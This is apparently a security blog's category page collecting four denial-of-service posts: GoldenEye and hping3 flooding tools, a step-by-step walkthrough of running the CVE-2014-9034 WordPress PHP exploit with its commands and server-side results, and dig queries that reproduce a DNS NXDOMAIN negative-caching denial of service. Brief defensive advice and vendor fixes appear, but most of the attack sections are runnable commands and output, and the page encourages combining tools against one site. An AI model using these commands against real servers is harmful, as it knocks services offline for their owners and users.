Category:

Denial-of-Service Attack (DoS)

In computing, a denial-of-service (DoS) is an attempt to make a machine or network resource unavailable to its intended users. A DoS attack generally consists of efforts to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet.

DoS website in Kali Linux using GoldenEye

by blackMORE May 18, 2015

written by blackMORE

I’ve talked about testing few DoS tools that can put heavy load on HTTP servers in order to bring them to their knees by exhausting resource pools. GoldenEye is the first of those tools and it is one of the newest I discovered in GitHub. You can DoS websites with GoldenEye and bring it down almost within 30 seconds depending on how big their memory pool is. Of course, it wont work on protected servers and servers behind a proper WAF, IDS, but this is a great tool to test your own Web Server for load testing and amend your iptables/Firewall rules accordingly.

You can also DoS using hping3 to simulate similar attacks or PHP exploit to attack Wordpress websites. There’s also few great tools that will allow you view live DDoS attacks maps worldwide in almost realtime.

May 18, 2015 19 comments

Denial-of-Service Attack (DoS)

Denial-of-service Attack – DoS using hping3 with spoofed IP in Kali Linux

by blackMORE April 21, 2015

written by blackMORE

In computing, a denial-of-service (DoS) or distributed denial-of-service (DDoS) attack is an attempt to make a machine or network resource unavailable to its intended users. Although the means to carry out, the motives for, and targets of a DoS attack vary, it generally consists of efforts to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet. In this article I will show how to carry out a Denial-of-service Attack or DoS using hping3 with spoofed IP in Kali Linux.

As clarification, distributed denial-of-service attacks are sent by two or more persons, or bots, and denial-of-service attacks are sent by one person or system. As of 2014, the frequency of recognized DDoS attacks had reached an average rate of 28 per hour.

Perpetrators of DoS attacks typically target sites or services hosted on high-profile web servers such as banks, credit card payment gateways, and even root nameservers.

Denial-of-service threats are also common in business, and are sometimes responsible for website attacks.

This technique has now seen extensive use in certain games, used by server owners, or disgruntled competitors on games, such as popular Minecraft servers. Increasingly, DoS attacks have also been used as a form of resistance. Richard Stallman has stated that DoS is a form of ‘Internet Street Protests’. The term is generally used relating to computer networks, but is not limited to this field; for example, it is also used in reference to CPU resource management.

One common method of attack involves saturating the target machine with external communications requests, so much so that it cannot respond to legitimate traffic, or responds so slowly as to be rendered essentially unavailable. Such attacks usually lead to a server overload. In general terms, DoS attacks are implemented by either forcing the targeted computer(s) to reset, or consuming its resources so that it can no longer provide its intended service or obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately.

Denial-of-service attacks are considered violations of the Internet Architecture Board’s Internet proper use policy, and also violate the acceptable use policies of virtually all Internet service providers. They also commonly constitute violations of the laws of individual nations.

hping3 works well if you have other DoS tools such as GoldenEye running (using multiple tools that attacks same site/server/service increases the chances of success). There are agencies and corporations to runs DoS attack map in Realtime. that shows worldwide DDoS attacks almost in realtime.

April 21, 2015 26 comments

wordpress-40-denial-of-service-proof-of-concept-explained - blackMORE Ops - 2

Denial-of-Service Attack (DoS)

Denial of Service Attack Proof of Concept PHP Exploit for <=4.0 WordPress DoS Attack - CVE-2014-9034

by blackMORE January 8, 2015

written by blackMORE

Proof of Concept PHP exploit for WordPress DoS Attack CVE-2014-9034 worked like a charm on my own WordPress website. Surprisingly, CVE-2014-9034 was published for sometime and it seems WordPress still hasn’t fixed this issue. I will explain how to use this Proof of Concept tool and test your own WordPress website for vulnerabilities.

WordPress DoS Attack – CVE-2014-9034

Credit for WordPress DoS Attack (Denial of Service Proof of Concept PHP Exploit CVE-2014-9034: WordPress <=4.0) goes to John from http://secureli.com. I will explain how to use this Proof of Concept tool and test your own WordPress website for vulnerability.

Searching exploit using searchspoit

How many of you used searchsploit in Kali Linux? It’s a nice tool that updates and downloads exploits often. I use it quite extensively along with MetaSploit.

Use searchsploit to search specific exploits. You can use it like this:

root@kali:~# searchsploit wordpress denial
---------------------------------------------|---------------------------------- 
 Description                                 |  Path
---------------------------------------------|----------------------------------
WordPress <=4.0 Denial of Service Exploit    | /php/webapps/35413.php
Wordpress < 4.0.1 - Denial of Service        | /php/webapps/35414.txt
---------------------------------------------|----------------------------------
root@kali:~#

Just in case you want to search something else, you -h and it shows the help menu. Now help yourself to find more vulnerabilities.

root@kali:~# searchsploit -h
Usage  : searchsploit [OPTIONS] term1 [term2] ... [termN]
Example: searchsploit oracle windows local

=========
 OPTIONS 
=========
 -c         - Perform case-sensitive searches; by default,
              searches will try to be greedy
 -v         - By setting verbose output, description lines
              are allowed to overflow their columns
 -h, --help - Show help screen

NOTES:
 - Use any number of search terms you would like (minimum: 1)
 - Search terms are not case sensitive, and order is irrelevant
root@kali:~#

Using searchsploit results

searchsploit files are located at /usr/share/exploitdb/ folder. You need to copy the exploit file to your home directory or something similar.

root@kali:~# mkdir bmo
root@kali:~# cd bmo/
root@kali:~/bmo# 
root@kali:~/bmo# cp /usr/share/exploitdb/platforms/php/webapps/35413.php .
root@kali:~/bmo# 
root@kali:~/bmo#

Running the exploit

To run this script you need to use PHP command… Here’s the little help menu:

CVE-2014-9034 | WordPress <= v4.0 Denial of Service Vulnerability
Proof-of-Concept developed by john@secureli.com (http://secureli.com)
usage: php wordpressed.php domain.com username numberOfThreads
e.g.: php wordpressed.php wordpress.org admin 50

First time I tried to run this php exploit, I received an error

root@kali:~/bmo# php 35413.php somesrandomsite.com admin 50

CVE-2014-9034 | WordPress <= v4.0 Denial of Service Vulnerability
Proof-of-Concept developed by john@secureli.com (http://secureli.com)

usage: php wordpressed.php domain.com username numberOfThreads
 e.g.: php wordpressed.php wordpress.org admin 50

Sending POST data (username: admin; threads: 50) to somerandomsite.comPHP Fatal error:  Call to undefined function curl_multi_init() in /root/wp/35413.php on line 12

This is because a package is missing in my Kali Linux. I need to install php5-curl package for that.

root@kali:~/bmo# apt-get install php5-curl 
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following NEW packages will be installed:
  php5-curl
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 29.4 kB of archives.
After this operation, 116 kB of additional disk space will be used.
Get:1 http://security.kali.org/kali-security/ kali/updates/main php5-curl amd64 5.4.36-0+deb7u1 [29.4 kB]
Fetched 29.4 kB in 1s (18.8 kB/s)  
Selecting previously unselected package php5-curl.
(Reading database ... 389427 files and directories currently installed.)
Unpacking php5-curl (from .../php5-curl_5.4.36-0+deb7u1_amd64.deb) ...
Processing triggers for libapache2-mod-php5 ...
[ ok ] Reloading web server config: apache2 not running.
Setting up php5-curl (5.4.36-0+deb7u1) ...

Creating config file /etc/php5/mods-available/curl.ini with new version
Processing triggers for libapache2-mod-php5 ...
[ ok ] Reloading web server config: apache2 not running.

root@kali:~/bmo#

Now retry running this exploit:

root@kali:~/bmo# php 35413.php somerandomsite.com  admin 50

CVE-2014-9034 | WordPress <= v4.0 Denial of Service Vulnerability
Proof-of-Concept developed by john@secureli.com (http://secureli.com)

usage: php wordpressed.php domain.com username numberOfThreads
 e.g.: php wordpressed.php wordpress.org admin 50

Sending POST data (username: admin; threads: 50) to somerandomsite.com^C
root@kali:~/bmo#

Server side experience

So this is what server side looks like

someuser@someserver [/home]# pstree
init─┬─/usr/local/cpan
     ├─httpd─┬─167*[httpd]
     ├─postgresql──238*
     ├─named───3*[{named}]
     ├─rsyslogd───3*[{rsyslogd}]
     ├─sshd───sshd───bash───pstree

httpd status before

   Server Built: Nov 17 2014 14:25:08
     __________________________________________________________________

   Current Time: Thursday, 08-Jan-2015 17:06:52 GMT
   Restart Time: Thursday, 08-Jan-2015 16:13:46 GMT
   Parent Server Generation: 0
   Server uptime: 53 minutes 6 seconds
   Total accesses: 6353 - Total Traffic: 26.9 MB
   CPU Usage: u89.86 s19.17 cu0 cs0 - 3.42% CPU load
   1.99 requests/sec - 8.7 kB/second - 4446 B/request
   1 requests currently being processed, 9 idle workers

___W___.._...._.._..............................................
................................................................
................................................................
................................................................

   Scoreboard Key:
   "_" Waiting for Connection, "S" Starting up, "R" Reading Request,
   "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup,
   "C" Closing connection, "L" Logging, "G" Gracefully finishing,
   "I" Idle cleanup of worker, "." Open slot with no current process

httpd status after

   Server Built: Nov 17 2014 14:25:08
     __________________________________________________________________

   Current Time: Thursday, 08-Jan-2015 17:08:51 GMT
   Restart Time: Thursday, 08-Jan-2015 17:08:26 GMT
   Parent Server Generation: 0
   Server uptime: 25 seconds
   Total accesses: 334 - Total Traffic: 64 GB
   CPU Usage: u1.85 s.33 cu0 cs0 - 8.72% CPU load
   1.36 requests/sec - 2621 B/second - 1927 B/request
   251 requests currently being processed, 12 idle workers

WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW_W_WWWWWWW____....__..C
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW_W_WWWWWWW....WWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW_W_WWWWWWW..WWWWWWW....
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW_W_WWWWWWW.............

   Scoreboard Key:
   "_" Waiting for Connection, "S" Starting up, "R" Reading Request,
   "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup,
   "C" Closing connection, "L" Logging, "G" Gracefully finishing,
   "I" Idle cleanup of worker, "." Open slot with no current process

Visible in my monitoring

So how does it look in my Munin monitoring? Well, pretty f’ed up. I got massive spikes all over the place

Defending against these attacks

Followings are your options:

The best way is to restrict wp-admin folder to specific IP’s.
Throttle connection’s per IP.
Use a WAF.
Write your own ModSecurity code in Apache or similar in NGINX (actually it would be nice to see how NGINX works against such attacks, any takers?).
Keep WordPress updated.

Conclusion

All in all, its a nice exploit and it does what it’s supposed to do, create massive connections and mysql load for a server. Run it few minutes and if the server is not throttling connections per IP, it will make the server unresponsive.

Here is John’s original post http://secureli.com/2014/11/28/wordpress40-denialofservice-proofofconcept/ about this exploit and I think WordPress should fix it ASAP.

Following explanation is taken from John’s site”

CVE-2014-9034 was published recently, highlighting an issue that “allows remote attackers to cause a denial of service (CPU consumption) via a long password that is improperly handled during hashing” due to phpass usage.

The full vulnerability information is available from:

This exploit uses a denial of service attack against wp-includes/class-phpass.php in the following WP versions:

before 3.7.5
3.8.x before 3.8.5
3.9.x before 3.9.3
4.x before 4.0.1

This is the first exploit against such attack and thanks to John for bringing it to our attention. Enjoy and ensure your website is protected against such attacks. Share and RT.

January 8, 2015 8 comments

How to exploit and fix a localized Denial-of-service caused by incorrect NXDOMAIN responses from AAAA queries - blackMORE Ops -4

BIND

IPv6 issues: Localized Denial-of-service caused by incorrect NXDOMAIN responses from AAAA queries

by blackMORE October 29, 2014

written by blackMORE

This is an unusual situation and a misconfiguration on DNS servers that can be exploited using a simple AAAA DNS query. This causes a localized Denial-of-service situation where users behind a specific resolver will get:

Error:
Unable to determine IP address from host name www.somevulnerablesite.com
The DNS server returned: Name Error: The domain name does not exist.
This means that the cache was not able to resolve the hostname presented in the URL.
Check of the address is correct.
Your cache administrator is root.

Before you read this article, you should read about AAAA records IPv6 addresses in the Domain Name System. Following section is taken directly from Vulnerability Note VU#714121

Overview

Some DNS servers respond with an inappropriate error message if queried for nonexistent AAAA records, which can lead to possible denial of service.

Description

Some DNS servers respond with a “Name Error” response code (NXDOMAIN, RCODE 3) instead of “No Error” (RCODE 0) when queried for a nonexistent AAAA record. (AAAA records are used to provide name-to-address resolution for IPv6 addresses, as described in RFC1886.)

When an NXDOMAIN response code is received, the querying resolver will usually stop attempting to resolve that name. Resolvers that support negative caching (RFC2308) and receive an NXDOMAIN response will not query for A records for the same resource until the negatively cached error response has expired.

Sites operating DNS servers that respond to queries for nonexistent AAAA records with NXDOMAIN response codes may be susceptible to attackers using other sites’ caching nameservers to block those other sites’ users from resolving records in domains served by the broken DNS servers. Similar attacks may be possible against caching resolvers if an attacker were able to induce the resolver to look up a nonexistent AAAA record from a server acting in this manner.

Note: The same issue occurs with A6 records. However, A6 records (RFC2874) have been deemed “Experimental” by the IETF, with preference being given to AAAA records (RFC3363, RFC3364).

This is not a new issue. The NXDOMAIN in response to a AAAA query issue was noted in the (now expired) Internet Draft
draft-itojun-jinmei-ipv6-issues-00.txt:

There are broken DNS servers that return NXDOMAIN against AAAA queries, when it should return NOERROR with empty return records. When deploying IPv6/v4 dual stack node, it becomes problem because dual stack nodes would query AAAA first, see NXDOMAIN error, and won’t try to query A records. These broken DNS servers need to be corrected.

However, we have not seen this issue documented elsewhere as a potential denial-of-service attack vector against sites with their DNS servers broken in this manner.

Impact

An attacker could create a localized denial-of-service condition by exploiting this vulnerability.

Solution

Apply a patch from your vendor.

Systems Affected

Usually BIND 8.2 or later versions are not affected. However, see below:

Vendor	Status	Date Notified	Date Updated
Cisco Systems Inc.	Affected	21 Mar 2003	23 May 2003
F5 Networks	Not	21 Mar 2003	23 May 2003
djbdns	Unknown	21 Mar 2003	21 Mar 2003
ISC	Unknown	21 Mar 2003	21 Mar 2003
Microsoft Corporation	Unknown	21 Mar 2003	21 Mar 2003
Openwall GNU/*/Linux	Unknown	21 Mar 2003	21 Mar 2003

Reproducing NXDOMAIN responses using AAAA queries

This is a proof of concept. Outputs are modified to conceal identities.

Step 1: Check standard A record response

Doing a simple DIG request to resolv2.blackmoreops.com for www.somevulnerablesite.com

Got a response with AUTHORITY: 2.

[user@blackmoreops-resolver2 ~]# dig www.somevulnerablesite.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 150580
;; flags: ar bd ca; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;www.somevulnerablesite.com. IN A

;; ANSWER SECTION:
www.somevulnerablesite.com. 30 IN A 100.100.100.100
;; AUTHORITY SECTION:
somesite.srd.com. 2705 IN NS loadbalancer1.xyz.com.
somesite.srd.com. 2705 IN NS loadbalancer2.xyz.com.

;; ADDITIONAL SECTION:
loadbalancer1.xyz.com. 18 IN A 200.200.200.200
loadbalancer2.xyz.com. 191 IN A 200.200.200.201
;; Query time: 23 msec
;; SERVER: 221.221.221.221#53(221.221.221.221)
;; WHEN: Wed Jan 3 23:04:51 2014
;; MSG SIZE rcvd: 150

Step 2: Request AAAA response

Doing a simple DIG AAAA request for www.somevulnerablesite.com. Got a NXDOMAIN response with AUTHORITY: 1.
Also note that the AUTORITY changed and we are missing DNS glue. (Additional Section)

Note: This is where it goes wrong, as We just received a NXDOMAIN response from an AUTHORITATIVE server.

This NXDOMAIN is now cached for 20 minutes.

[user@blackmoreops-resolver2 ~]#  dig AAAA www.somevulnerablesite.com

; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 24603
;; flags: ar bd ca; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;www.somevulnerablesite.com. IN AAAA

;; AUTHORITY SECTION:
somesite.srd.com.    1200    IN      SOA     loadbalancer2.xyz.com. hostmaster.removedaddress.com. 2014031841 3600 900 2207600 1200
;; Query time: 23 msec
;; SERVER: 221.221.221.221#53(221.221.221.221)
;; WHEN: Wed Jan  3 23:05:02 2014
;; MSG SIZE  rcvd: 120

Step 3: Any subsequent DIG requests will give NXDOMAIN responses

Doing a Simple DIG request for www.somevulnerablesite.com

Got a NXDOMAIN response with AUTHORITY: 1.

This happens because an NXDOMAIN takes preferences for both ipv4 and ipv6. (also it’s now cached)

[user@blackmoreops-resolver2 ~]#  dig www.somevulnerablesite.com

; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 24179
;; flags: ar bd ca; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;www.somevulnerablesite.com. IN A 

;; AUTHORITY SECTION:
somesite.srd.com.    1196    IN      SOA     loadbalancer2.xyz.com. hostmaster.removedaddress.com. 2014031841 3600 900 2207600 1200 

;; Query time: 0 msec
;; SERVER: 221.221.221.221#53(221.221.221.221)
;; WHEN: Wed Jan  3 23:05:02 2014
;; MSG SIZE  rcvd: 120

In this particular case, it was a mis-configured F5 GTM (Global Traffic Manager) and the solution was forwarded to the the Network Admin of the vulnerable site.

F5 Solution

http://support.f5.com/kb/en-us/solutions/public/7000/800/sol7851.html

However, even though F5’s can be synced, you need to configure each F5 (F5 v9 and F5 v10 comes in pair, starting v11, you can have more than two) WIP IPv6 NoError response manually as that part of config is not in the shared directory (i.e. /config).

Conclusion

This is a very simple Denial-of-service attack and extremely tough to detect as DNS is the last place a Network admin would look. This affect Cisco Systems, F5 GTM’s, djbdns, ISC, Microsoft DNS and Openwall GNU/*/Linux DNS servers. In most cases this is caused when the same DNS server is used for a long time and ipv6 is not taken into account. New installation of DNS servers usually encounters it pretty well and in case of a AAAA request, it will send a NOERROR response.

Interestingly, Google seems to be invulnerable to NXDOMAIN caching and responses, I am not sure if Google uses dig +trace to determine a DNS response or if they are breaking RFC by not respecting a NXDOMAIN response from an Authoritative server. Either way, if you’re using Google DNS resolvers, you’re safe. But secured resolvers usually caches a NXDOMAIN responses for 10-20 minutes and by sending this AAAA request, you can make a domain unavailable for all users behind that resolver.

Also know that all the vendors fixed this issue (at least the ones using BIND 8.2 or later), but you get those few older version in the wild sometimes.

Useful resources

October 29, 2014 1 comment

Newer Posts

Older Posts